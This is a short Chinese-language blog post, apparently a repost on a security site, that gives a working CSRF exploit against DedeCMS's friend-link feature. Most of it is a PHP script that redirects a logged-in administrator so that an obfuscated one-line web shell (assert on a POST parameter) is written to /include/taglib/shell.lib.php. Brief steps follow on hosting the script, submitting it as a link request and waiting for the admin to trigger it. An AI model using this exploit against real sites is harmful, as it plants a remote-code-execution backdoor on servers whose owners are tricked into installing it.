dedecms 友链 getshell

admin 2023年12月15日00:50:29评论12 views字数 803阅读2分40秒阅读模式

csrf getshell

<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);
$muma = '<'.'?'.'a'.'s'.'s'.'e'.'r'.'t'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'a'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

将 exp 部署在服务器上

申请链接

/plus/flink.php

添加链接 网站填上 exp 的链接

http://cn-sec.com/wp-content/uploads/2023/12/20231214161918-17.png

之后等待管理员触发

shell 地址

/include/taglib/shell.lib.php

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日00:50:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   dedecms 友链 getshellhttp://cn-sec.com/archives/2301458.html

发表评论

匿名网友 填写信息